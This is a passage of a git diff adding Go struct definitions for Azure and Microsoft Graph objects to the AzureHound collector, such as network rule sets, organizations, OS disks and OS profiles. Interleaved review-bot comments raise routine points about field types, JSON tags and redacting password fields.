+ Value string `json:"value,omitempty"`
+}
diff --git a/models/azure/network_interface_ref.go b/models/azure/network_interface_ref.go
new file mode 100644
index 0000000..b43c6df
--- /dev/null
+++ b/models/azure/network_interface_ref.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Describes a network interface reference.
+type NetworkInterfaceReference struct {
+ // Resource ID.
+ Id string `json:"id,omitempty"`
+
+ Properties NetworkInterfaceReferenceProperties `json:"properties,omitempty"`
+}
diff --git a/models/azure/network_interface_reference_props.go b/models/azure/network_interface_reference_props.go
new file mode 100644
index 0000000..7737191
--- /dev/null
+++ b/models/azure/network_interface_reference_props.go
@@ -0,0 +1,28 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type NetworkInterfaceReferenceProperties struct {
+ // Specify what happens to the network interface when the VM is deleted.
+ DeleteOption enums.VMDeleteOption `json:"deleteOption,omitempty"`
+
+ // Specifies the primary network interface in case the virtual machine has more than 1 network interface.
+ Primary bool `json:"primary,omitempty"`
+}
diff --git a/models/azure/network_profile.go b/models/azure/network_profile.go
new file mode 100644
index 0000000..8c6ff82
--- /dev/null
+++ b/models/azure/network_profile.go
@@ -0,0 +1,31 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Specifies the network interfaces or the networking configuration of the virtual machine.
+type NetworkProfile struct {
+ // Specifies the Microsoft.Network API version used when creating networking resources in the Network Interface
+ // Configurations.
+ NetworkApiVersion string `json:"networkApiVersion,omitempty"`
+
+ // Specifies the networking configurations that will be used to create the virtual machine networking resources.
+ NetworkInterfaceConfigurations []VirtualMachineNetworkInterfaceConfiguration `json:"networkInterfaceConfigurations,omitempty"`
+
+ // Specifies the list of resource Ids for the network interfaces associated with the virtual machine.
+ NetworkInterfaces []NetworkInterfaceReference `json:"networkInterfaces,omitempty"`
+}
diff --git a/models/azure/network_rule_set.go b/models/azure/network_rule_set.go
new file mode 100644
index 0000000..5f27fe0
--- /dev/null
+++ b/models/azure/network_rule_set.go
@@ -0,0 +1,39 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import (
+ "github.com/bloodhoundad/azurehound/v2/enums"
+)
+
+// A set of rules governing the network accessibility of a vault.
+type NetworkRuleSet struct {
+ // Tells what traffic can bypass network rules. This can be 'AzureServices' or 'None'.
+ // If not specified the default is 'AzureServices'.
+ Bypass enums.BypassOption `json:"bypass,omitempty"`
+
+ // The default action when no rule from ipRules and from virtualNetworkRules match.
+ // This is only used after the bypass property has been evaluated.
+ DefaultAction enums.NetworkAction `json:"defaultAction,omitempty"`
+
+ // The list of IP address rules.
+ IPRules []IPRule `json:"ipRules,omitempty"`
+
+ // The list of virtual network rules.
+ VirtualNetworkRules []VirtualNetworkRule `json:"virtualNetworkRules,omitempty"`
+}
diff --git a/models/azure/object_identity.go b/models/azure/object_identity.go
new file mode 100644
index 0000000..44569bb
--- /dev/null
+++ b/models/azure/object_identity.go
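Review bot: The `Bypass` comment says the service default is 'AzureServices' when the property is not specified, but an absent property decodes to the zero value of `enums.BypassOption` (presumably an empty string; the enum is defined outside this hunk). Code that assesses a vault's network exposure from this struct has to read an empty value as AzureServices, meaning trusted Azure services pass the rules, and not as None. I would state that on the field: `// An empty value means the API omitted the property; treat it as AzureServices, not None.`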
@@ -0,0 +1,55 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+// Represents an identity used to sign in to a user account. An identity can be provided by Microsoft (a.k.a. local
+// account), by organizations, or by 3rd party identity providers such as Facebook or Google that are tied to a user
+// account.
+// Note: For `$filter` both {@link Issuer} and {@link IssuerAssignedId} must be supplied.
+// For more detail, see https://docs.microsoft.com/en-us/graph/api/resources/objectidentity?view=graph-rest-1.0
+type ObjectIdentity struct {
+ // Specifies the user sign-in types in your directory.
+ // Federated represents a unique identifier for a user from an issuer, that can be in any format chosen by the
+ // issuer.
+ // Setting or updating a UserPrincipalName identity will update the value of the userPrincipalName property on the
+ // user object. The validations performed on the userPrincipalName property on the user object, for example,
+ // verified domains and acceptable characters, will be performed when setting or updating a UserPrincipalName
+ // identity.
+ // Additional validation is enforced on issuerAssignedId when the sign-in type is set to Email or UserName.
+ // This property can also be set to any custom string; use string(SignInType) or enums.signintype(someValue) to
+ // convert appropriately.
+ SignInType enums.SigninType `json:"signInType,omitempty"`
+
+ // Specifies the issuer of the identity.
+ // **Notes:**
+ // * For local accounts where {@link SignInType} is not `federated`, the value is the local B2C tenant default domain
+ // name.
+ // * For external users from other Azure AD organizations, this will be the domain of the federated organization.
+ //
+ // Supports `$filter` w/ 512 character limit.
+ Issuer string `json:"issuer,omitempty"`
+
+ // Specifies the unique identifier assigned to the user by the issuer. The combination of issuer and
+ // issuerAssignedId must be unique within the organization.
+ // For more detail, see https://docs.microsoft.com/en-us/graph/api/resources/objectidentity?view=graph-rest-1.0
+ //
+ // Supports `$filter` w/ 100 character limit
+ IssuerAssignedId string `json:"issuerAssignedId,omitempty"`
+}
diff --git a/models/azure/onprem_ext_attributes.go b/models/azure/onprem_ext_attributes.go
new file mode 100644
index 0000000..d5019c0
--- /dev/null
+++ b/models/azure/onprem_ext_attributes.go
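Review bot: The `SignInType` comment tells readers to convert with `enums.signintype(someValue)`, which does not match the field's type `enums.SigninType`; it should read `enums.SigninType(someValue)`. The `{@link Issuer}`, `{@link IssuerAssignedId}` and `{@link SignInType}` markers in the type and `Issuer` comments are Javadoc syntax and show up literally in Go documentation, so plain field names read better. The type comment should also open with the type name, `// ObjectIdentity represents an identity used to sign in to a user account.`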
@@ -0,0 +1,48 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// The return type of the onPremisesExtensionAttributes property of the user object and extensionAttributes property of
+// the device object.
+// Returns fifteen custom extension attribute properties.
+//
+// On the user entity and for an onPremisesSyncEnabled user, the source of authority for this set of properties is the
+// on-premises Active Directory which is synchronized to Azure AD, and is read-only. For a cloud-only user (where
+// onPremisesSyncEnabled is false), these properties can be set during creation or update. If a cloud-only user was
+// previously synced from on-premises Active Directory, these properties cannot be managed via the Microsoft Graph API.
+// Instead, they can be managed through the Exchange Admin Center or the Exchange Online V2 module in PowerShell.
+//
+// The extensionAttributes property of the device entity is managed only in Azure AD during device creation or update.
+// Note: These extension attributes are also known as Exchange custom attributes 1-15.
+type OnPremisesExtensionAttributes struct {
+ ExtensionAttribute1 string `json:"extensionAttribute1,omitempty"`
+ ExtensionAttribute2 string `json:"extensionAttribute2,omitempty"`
+ ExtensionAttribute3 string `json:"extensionAttribute3,omitempty"`
+ ExtensionAttribute4 string `json:"extensionAttribute4,omitempty"`
+ ExtensionAttribute5 string `json:"extensionAttribute5,omitempty"`
+ ExtensionAttribute6 string `json:"extensionAttribute6,omitempty"`
+ ExtensionAttribute7 string `json:"extensionAttribute7,omitempty"`
+ ExtensionAttribute8 string `json:"extensionAttribute8,omitempty"`
+ ExtensionAttribute9 string `json:"extensionAttribute9,omitempty"`
+ ExtensionAttribute10 string `json:"extensionAttribute10,omitempty"`
+ ExtensionAttribute11 string `json:"extensionAttribute11,omitempty"`
+ ExtensionAttribute12 string `json:"extensionAttribute12,omitempty"`
+ ExtensionAttribute13 string `json:"extensionAttribute13,omitempty"`
+ ExtensionAttribute14 string `json:"extensionAttribute14,omitempty"`
+ ExtensionAttribute15 string `json:"extensionAttribute15,omitempty"`
+}
diff --git a/models/azure/onprem_provisioning_error.go b/models/azure/onprem_provisioning_error.go
new file mode 100644
index 0000000..8bc1b4a
--- /dev/null
+++ b/models/azure/onprem_provisioning_error.go
@@ -0,0 +1,36 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Represents directory synchronization errors for the user, group and orgContact resources when synchronizing
+// on-premises directories to Azure Active Directory.
+type OnPremisesProvisioningError struct {
+ // Category of the provisioning error. Note: Currently, there is only one possible value.
+ // Possible value: PropertyConflict - indicates a property value is not unique. Other objects contain the same value
+ // for the property.
+ Category string `json:"category,omitempty"`
+
+ // The date and time at which the error occurred.
+ OccurredDateTime string `json:"occurredDateTime,omitempty"`
+
+ // Name of the directory property causing the error. Current possible values: UserPrincipalName or ProxyAddress.
+ PropertyCausingError string `json:"propertyCausingError,omitempty"`
+
+ // Value of the property causing the error.
+ Value string `json:"value,omitempty"`
+}
diff --git a/models/azure/optional_claims.go b/models/azure/optional_claims.go
new file mode 100644
index 0000000..542840a
--- /dev/null
+++ b/models/azure/optional_claims.go
@@ -0,0 +1,59 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Contains an optional claim associated with an application . The idToken, accessToken, and saml2Token properties of
+// the optionalClaims resource is a collection of optionalClaim. If supported by a specific claim, you can also modify
+// the behavior of the optionalClaim using the additionalProperties property.
+// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/optionalclaim?view=graph-rest-1.0
+type OptionalClaim struct {
+ // Additional properties of the claim. If a property exists in this collection, it modifies the behavior of the
+ // optional claim specified in the name property.
+ AdditionalProperties []string `json:"additionalProperties,omitempty"`
+
+ // If the value is true, the claim specified by the client is necessary to ensure a smooth authorization experience
+ // for the specific task requested by the end user. The default value is false.
+ Essential bool `json:"essential,omitempty"`
+
+ // The name of the optional claim.
+ Name string `json:"name,omitempty"`
+
+ // The source (directory object) of the claim.
+ // There are predefined claims and user-defined claims from extension properties. If the source value is null, the
+ // claim is a predefined optional claim. If the source value is user, the value in the name property is the
+ // extension property from the user object.
+ Source string `json:"source,omitempty"`
+}
+
+// Declares the optional claims requested by an application. An application can configure optional claims to be returned
+// in each of three types of tokens (ID token, access token, SAML 2 token) it can receive from the security token
+// service. An application can configure a different set of optional claims to be returned in each token type.
+//
+// Application developers can configure optional claims in their Azure AD apps to specify which claims they want in
+// tokens sent to their application by the Microsoft security token service.
+// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/optionalclaims?view=graph-rest-1.0
+type OptionalClaims struct {
+ // The optional claims returned in the JWT ID token.
+ IdToken []OptionalClaim `json:"idToken,omitempty"`
+
+ // The optional claims returned in the JWT access token.
+ AccessToken []OptionalClaim `json:"accessToken,omitempty"`
+
+ // The optional claims returned in the SAML token.
+ Saml2Token []OptionalClaim `json:"saml2Token,omitempty"`
+}
diff --git a/models/azure/organization.go b/models/azure/organization.go
new file mode 100644
index 0000000..f3d4aeb
--- /dev/null
+++ b/models/azure/organization.go
@@ -0,0 +1,140 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import (
+ "fmt"
+)
+
+// Represents the Azure Active Directory tenant that the user or application is signed in to
+type Organization struct {
+ DirectoryObject
+
+ // The collection of service plans associated with the tenant
+ AssignedPlans []AssignedPlan `json:"assignedPlans,omitempty"`
+
+ // Telephone number for the organization. Although this is a string collection, only one number can be set for this
+ // property.
+ BusinessPhones []string `json:"businessPhones,omitempty"`
+
+ // City name of the address for the organization.
+ City string `json:"city,omitempty"`
+
+ // Country or region name of the address for the organization.
+ Country string `json:"country,omitempty"`
+
+ // Country or region abbreviation for the organization in ISO 3166-2 format.
+ CountryLetterCode string `json:"countryLetterCode,omitempty"`
+
+ // Timestamp of when the organization was created. The value cannot be modified and is automatically populated when
+ // the organization is created. The Timestamp type represents date and time information using ISO 8601 format and is
+ // always in UTC time. For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z.
+ //
+ // Read-only.
+ CreatedDateTime string `json:"createdDateTime,omitempty"`
+
+ // Represents date and time of when the Azure AD tenant was deleted using ISO 8601 format and is always in UTC time.
+ // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z.
+ //
+ // Read-only.
+ DeletedDateTime string `json:"deletedDateTime,omitempty"`
+
+ // The display name for the tenant.
+ DisplayName string `json:"displayName,omitempty"`
+
+ // `true` if organization is Multi-Geo enabled; false if organization is not Multi-Geo enabled;
+ //
+ // null (default).
+ // Read-only.
+ IsMultipleDataLocationsForServicesEnabled bool `json:"isMultipleDataLocationsForServicesEnabled,omitempty"`
+
+ MarketingNotificationEmails []string `json:"marketingNotificationEmails,omitempty"`
+
+ // The time and date at which the tenant was last synced with the on-premises directory.
+ // The Timestamp type represents date and time information using ISO 8601 format and is always in UTC time.
+ // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z.
+ //
+ // Read-only.
+ OnPremisesLastSyncDateTime string `json:"onPremisesLastSyncDateTime,omitempty"`
+
+ // `true` if this object is synced from an on-premises directory;
+ // `false` if this object was originally synced from an on-premises directory but is no longer synced.
+ // `null` if this object has never been synced from an on-premises directory (default).
+ OnPremisesSyncEnabled *bool `json:"onPremisesSyncEnabled,omitempty"`
+
+ // Postal code of the address for the organization.
+ PostalCode string `json:"postalCode,omitempty"`
+
+ // The preferred language for the organization.
+ // Should follow ISO 639-1 Code; for example, `en`.
+ PreferredLanguage string `json:"preferredLanguage,omitempty"`
+
+ // The privacy profile of an organization.
+ PrivacyProfile PrivacyProfile `json:"privacyProfile,omitempty"`
+
+ ProvisionedPlans []ProvisionedPlan `json:"provisionedPlans,omitempty"`
+
+ SecurityComplianceNotificationMails []string `json:"securityComplianceNotificationMails,omitempty"`
+
+ SecurityComplianceNotificationPhones []string `json:"securityComplianceNotificationPhones,omitempty"`
+
+ // State name of the address for the organization
+ State string `json:"state,omitempty"`
+
+ // Street name of the address for the organization.
+ Street string `json:"streetAddress,omitempty"`
+
+ TechnicalNotificationMails []string `json:"technicalNotificationMails,omitempty"`
+
+ // The tenant type. Only available for 'Home' TenantCategory
+ TenantType string `json:"tenantType,omitempty"`
+
+ // The collection of domains associated with this tenant.
+ VerifiedDomains []VerifiedDomain `json:"verifiedDomains,omitempty"`
+}
+
+func (s Organization) ToTenant() Tenant {
+ var (
+ defaultDomain string
+ domains []string
+ )
+
+ for _, domain := range s.VerifiedDomains {
+ if domain.IsDefault {
+ defaultDomain = domain.Name
+ }
+ domains = append(domains, domain.Name)
+ }
+
+ return Tenant{
+ Country: s.Country,
+ CountryCode: s.CountryLetterCode,
+ DefaultDomain: defaultDomain,
+ DisplayName: s.DisplayName,
+ Domains: domains,
+ Id: fmt.Sprintf("/tenants/%s", s.Id),
+ TenantType: s.TenantType,
+ TenantId: s.Id,
+ }
+}
+
+type OrganizationList struct {
+ Count int `json:"@odata.count,omitempty"` // The total count of all results
+ NextLink string `json:"@odata.nextLink,omitempty"` // The URL to use for getting the next set of values.
+ Value []Organization `json:"value"` // A list of organizations.
+}
diff --git a/models/azure/os_disk.go b/models/azure/os_disk.go
new file mode 100644
index 0000000..d43e47e
--- /dev/null
+++ b/models/azure/os_disk.go
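Review bot: `IsMultipleDataLocationsForServicesEnabled` in organization.go is declared as a plain `bool` although its own comment describes three states (true, false, and null as the default), so after decoding, a null or absent value cannot be told apart from an explicit false. The neighbouring `OnPremisesSyncEnabled` already models the same three-state case as `*bool`, and the same type would fit here. Separately, `ToTenant` and `OrganizationList` have no doc comments; for `ToTenant` a line such as `// ToTenant maps the organization to a Tenant; Id is built as "/tenants/" + s.Id, so s.Id is expected to be non-empty.` would record the precondition that the `fmt.Sprintf` call relies on.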
@@ -0,0 +1,78 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Specifies information about the operating system disk used by the virtual machine.
+// For more information about disks, see About disks and VHDs for Azure virtual machines.
+type OSDisk struct {
+ // Specifies the caching requirements.
+ // Possible values are:
+ // None
+ // ReadOnly
+ // ReadWrite
+ //
+ // Default: None for Standard storage. ReadOnly for Premium storage.
+ Caching string `json:"caching,omitempty"`
+
+ // Specifies how the virtual machine should be created.
+ // Possible values are:
+ // Attach - This value is used when you are using a specialized disk to create the virtual machine.
+ // FromImage - This value is used when you are using an image to create the virtual machine. If you are using a platform image, you also use the imageReference element described above. If you are using a marketplace image, you also use the plan element previously described.
+ CreateOption string `json:"createOption,omitempty"`
+
+ // Specifies whether data disk should be deleted or detached upon VM deletion.
+ // Possible values:
+ // Delete - If this value is used, the data disk is deleted when VM is deleted.
+ // Detach - If this value is used, the data disk is retained after VM is deleted.
+ // The default value is set to detach. For an ephemeral OS Disk, the default value is set to Delete. User cannot change the delete option for ephemeral OS Disk.
+ DeleteOption string `json:"deleteOption,omitempty"`
+
+ // Specifies the ephemeral Disk Settings for the operating system disk used by the virtual machine.
+ DiffDiskSettings DiffDiskSettings `json:"diffDiskSettings,omitempty"`
+
+ // Specifies the size of an empty data disk in gigabytes.
+ // This element can be used to overwrite the size of the disk in a virtual machine image.
+ // This value cannot be larger than 1023 GB
+ DiskSizeGB int `json:"diskSizeGB,omitempty"`
+
+ // Specifies the encryption settings for the OS Disk.
+ // Minimum api-version: 2015-06-15
+ EncryptionSettings DiskEncryptionSettings `json:"encryptionSettings,omitempty"`
+
+ // The source user image virtual hard disk. The virtual hard disk will be copied before being attached to the
+ // virtual machine. If SourceImage is provided, the destination virtual hard drive must not exist.
+ Image VirtualHardDisk `json:"image,omitempty"`
+
+ // The managed disk parameters.
+ ManagedDisk ManagedDiskParameters `json:"managedDisk,omitempty"`
+
+ // The disk name.
+ Name string `json:"name,omitempty"`
+
+ // This property allows you to specify the type of the OS that is included in the disk if creating a VM from user-image or a specialized VHD.
+ // Possible values are:
+ // - Windows
+ // - Linux
+ OSType string `json:"osType,omitempty"`
+
+ // The virtual hard disk.
+ Vhd VirtualHardDisk `json:"vhd,omitempty"`
+
+ // Specifies whether writeAccelerator should be enabled or disabled on the disk.
+ WriteAcceleratorEnabled bool `json:"writeAcceleratorEnabled,omitempty"`
+}
diff --git a/models/azure/os_profile.go b/models/azure/os_profile.go
new file mode 100644
index 0000000..3b95fc6
--- /dev/null
+++ b/models/azure/os_profile.go
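Review bot: `omitempty` has no effect on the struct-valued fields of `OSDisk` in os_disk.go (`DiffDiskSettings`, `EncryptionSettings`, `Image`, `ManagedDisk`, `Vhd`), because encoding/json never treats a struct value as empty; marshaling an OSDisk therefore always emits these keys as objects, even when the API response contained none of them. If consumers of the output need to tell "not reported" from "reported but empty" (for example, whether encryption settings were present at all), pointer fields such as `EncryptionSettings *DiskEncryptionSettings` would preserve that. The same applies to `PrivacyProfile` in organization.go and to `LinuxConfiguration` and `WindowsConfiguration` in os_profile.go. The `DeleteOption` and `DiskSizeGB` comments also speak of a data disk although the type describes the OS disk, which looks carried over from the data-disk documentation.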
@@ -0,0 +1,80 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Specifies the operating system settings for the virtual machine. Some of the settings cannot be changed once VM is
+// provisioned.
+type OSProfile struct {
+ // Specifies the password of the administrator account.
+ // Minimum-length (Windows): 8 characters
+ // Minimum-length (Linux): 6 characters
+ // Max-length (Windows): 123 characters
+ // Max-length (Linux): 72 characters
+ // Complexity requirements: 3 out of 4 conditions below need to be fulfilled
+ // Has lower characters
+ // Has upper characters
+ // Has a digit
+ // Has a special character (Regex match [\W_])
+ // Disallowed values: "abc@123", "P@$$w0rd", "P@ssw0rd", "P@ssword123", "Pa$$word", "pass@word1", "Password!", "Password1", "Password22", "iloveyou!"
+ // For resetting the password, see How to reset the Remote Desktop service or its login password in a Windows VM
+ // For resetting root password, see Manage users, SSH, and check or repair disks on Azure Linux VMs using the VMAccess Extension
+ AdminPassword string `json:"adminPassword,omitempty,omitempty"`
+
+ // Specifies the name of the administrator account.
+ // This property cannot be updated after the VM is created.
+ // Windows-only restriction: Cannot end in "."
+ // Disallowed values: "administrator", "admin", "user", "user1", "test", "user2", "test1", "user3", "admin1", "1", "123", "a", "actuser", "adm", "admin2", "aspnet", "backup", "console", "david", "guest", "john", "owner", "root", "server", "sql", "support", "support_388945a0", "sys", "test2", "test3", "user4", "user5".
+ // Minimum-length (Linux): 1 character
+ // Max-length (Linux): 64 characters
+ // Max-length (Windows): 20 characters.
+ AdminUsername string `json:"adminUsername,omitempty,omitempty"`
+
+ // Specifies whether extension operations should be allowed on the virtual machine.
+ // This may only be set to False when no extensions are present on the virtual machine.
+ AllowExtensionOperations bool `json:"allowExtensionOperations,omitempty,omitempty"`
+
+ // Specifies the host OS name of the virtual machine.
+ // This name cannot be updated after the VM is created.
+ // Max-length (Windows): 15 characters
+ // Max-length (Linux): 64 characters.
+ // For naming conventions and restrictions see Azure infrastructure services implementation guidelines.
+ ComputerName string `json:"computerName,omitempty,omitempty"`
+
+ // Specifies a base-64 encoded string of custom data. The base-64 encoded string is decoded to a binary array that is saved as a file on the Virtual Machine. The maximum length of the binary array is 65535 bytes.
+ // Note: Do not pass any secrets or passwords in customData property
+ // This property cannot be updated after the VM is created.
+ // customData is passed to the VM to be saved as a file, for more information see Custom Data on Azure VMs
+ // For using cloud-init for your Linux VM, see Using cloud-init to customize a Linux VM during creation
+ CustomData string `json:"customData,omitempty,omitempty"`
+
+ // Specifies the Linux operating system settings on the virtual machine.
+ // For a list of supported Linux distributions, see Linux on Azure-Endorsed Distributions.
+ LinuxConfiguration LinuxConfiguration `json:"linuxConfiguration,omitempty,omitempty"`
+
+ // Specifies whether the guest provision signal is required to infer provision success of the virtual machine.
+ // Note: This property is for private testing only, and all customers must not set the property to false.
+ RequireGuestProvisionSignal bool `json:"requireGuestProvisionSignal,omitempty,omitempty"`
+
+ // Specifies set of certificates that should be installed onto the virtual machine. To install certificates on a
+ // virtual machine it is recommended to use the Azure Key Vault virtual machine extension for Linux or the
+ // Azure Key Vault virtual machine extension for Windows.
+ Secrets []VaultSecretGroup `json:"secrets,omitempty,omitempty"`
+
+ // Specifies Windows operating system settings on the virtual machine.
+ WindowsConfiguration WindowsConfiguration `json:"windowsConfiguration,omitempty,omitempty"`
+}
diff --git a/models/azure/parent_group_info.go b/models/azure/parent_group_info.go
new file mode 100644
index 0000000..0b03dbd
--- /dev/null
+++ b/models/azure/parent_group_info.go
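Review bot: `AdminPassword` and `CustomData` in `OSProfile` (os_profile.go) are ordinary tagged string fields, so if either is ever populated its value is written verbatim into whatever this struct is marshaled to (collected output, logs, debug dumps). Whether the read API actually returns them cannot be seen from this hunk, but each field should carry a comment marking it as sensitive, and the output path should redact or drop the value (a redacting `MarshalJSON`, or an output type without these fields) when the collector does not need it. The same concern applies to `SecretText` in password_credential.go and `Password` in password_profile.go. Every tag in this struct also repeats its option, e.g. `json:"adminPassword,omitempty,omitempty"`; a single `omitempty` is presumably what was meant.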
@@ -0,0 +1,24 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type ParentGroupInfo struct {
+ DisplayName string `json:"displayName,omitempty"`
+ Id string `json:"id,omitempty"`
+ Name string `json:"name,omitempty"`
+}
diff --git a/models/azure/parental_controls_settings.go b/models/azure/parental_controls_settings.go
new file mode 100644
index 0000000..a18ebbd
--- /dev/null
+++ b/models/azure/parental_controls_settings.go
@@ -0,0 +1,29 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+// Specifies parental control settings for an application. These settings control the consent experience.
+// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/parentalcontrolsettings?view=graph-rest-1.0
+type ParentalControlSettings struct {
+ // Specifies the ISO 3166 country codes for which access to the application will be blocked for minors.
+ CountriesBlockedForMinors []string `json:"countriesBlockedForMinors,omitempty"`
+ // Specifies the legal age group rule that applies to users of the app.
+ LegalAgeGroupRule enums.LegalAgeGroupRule `json:"legalAgeGroupRule,omitempty"`
+}
diff --git a/models/azure/password_credential.go b/models/azure/password_credential.go
new file mode 100644
index 0000000..b67b96d
